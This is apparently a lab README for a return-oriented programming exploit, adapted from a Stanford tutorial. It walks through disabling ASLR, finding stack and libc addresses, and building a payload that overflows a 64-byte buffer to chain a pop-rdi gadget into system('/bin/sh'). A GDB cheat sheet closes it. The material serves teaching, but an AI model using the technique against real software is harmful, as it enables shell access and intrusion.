This is based on <https://crypto.stanford.edu/~blynn/rop/>, the
Makefile automates most of this. This has been tested on Debian 10.8
running kernel 4.19.0-13-amd64 and using gcc (Debian 8.3.0-6) 8.3.0.

1. Compile and run the victim code

   make victim
   setarch $(arch) -R ./victim

2. Grab the address where the buffer is located on the stack and
   update the Makefile if necessary

3. Run the victim and use pmap to find the base address of the libc
   text segment, update the Makefile if necessary

   setarch $(arch) -R ./victim &
   pmap $(pidof victim)

4. Create the attack input

   make attack.bin

                      : .... .... .... .... :
   0x00007fffffffe328 | c0c9 e3f7 ff7f 0000 | ] return to system =>
   0x00007fffffffe320 | d0e2 ffff ff7f 0000 | ] char *command ------.
                      +---------------------+                       |
   0x00007fffffffe318 | 5fba e1f7 ff7f 0000 | ] return to gadget => | 
   0x00007fffffffe310 | 0000 0000 0000 0000 | ] saved rbp           |
                      |---------------------| <- rbp                |
   0x00007fffffffe308 | 0000 0000 0000 0000 | \                     |
   0x00007fffffffe300 | 0000 0000 0000 0000 |  |                    |
   0x00007fffffffe2f8 | 0000 0000 0000 0000 |  |                    |
   0x00007fffffffe2f0 | 0000 0000 0000 0000 |  | char name[64]      | 
   0x00007fffffffe2e8 | 0000 0000 0000 0000 |  |                    |
   0x00007fffffffe2e0 | 0000 0000 0000 0000 |  |                    |
   0x00007fffffffe2d8 | 0000 0000 0000 0000 |  |                    |
   0x00007fffffffe2d0 | 2f62 696e 2f73 6800 | /                     |
                      '---------------------' <- rsp <--------------'

   0x00007ffff7e3c9c0:	test   %rdi,%rdi        # system
   0x00007ffff7e3c9c3:	je     0x7ffff7e3c9d0 <__libc_system+16>
   0x00007ffff7e3c9c5:	jmpq   0x7ffff7e3c420 <do_system>
   0x00007ffff7e3c9ca:	nopw   0x0(%rax,%rax,1)
   0x00007ffff7e3c9d0:	sub    $0x8,%rsp
   0x00007ffff7e3c9d4:	lea    0x13cb46(%rip),%rdi
   0x00007ffff7e3c9db:	callq  0x7ffff7e3c420 <do_system>
   0x00007ffff7e3c9e0:	test   %eax,%eax
   0x00007ffff7e3c9e2:	sete   %al
   0x00007ffff7e3c9e5:	add    $0x8,%rsp
   0x00007ffff7e3c9e9:	movzbl %al,%eax
   0x00007ffff7e3c9ec:	retq

   0x0007ffff7e1ba5f:	pop    %rdi             # gadget
   0x0007ffff7e1ba60:	retq


5. Run the attack

   make attack

* GDB cheat sheet

  info proc mappings            Shows the process memory segments
  info registers                Shows the registers of the processor
  info frame                    Shows information about the current frame
  up/down                       Move up/down the stack frames
  x/8i system                   Examine 8 instructions starting at system
  x/8c $rsp                     Examine 8 characters starting at $rsp
  x/12g $rsp                    Examine 12 giant words starting at $rsp
  br                            Set a breakpoint
  c                             Continue execution
  s                             Set over the next instruction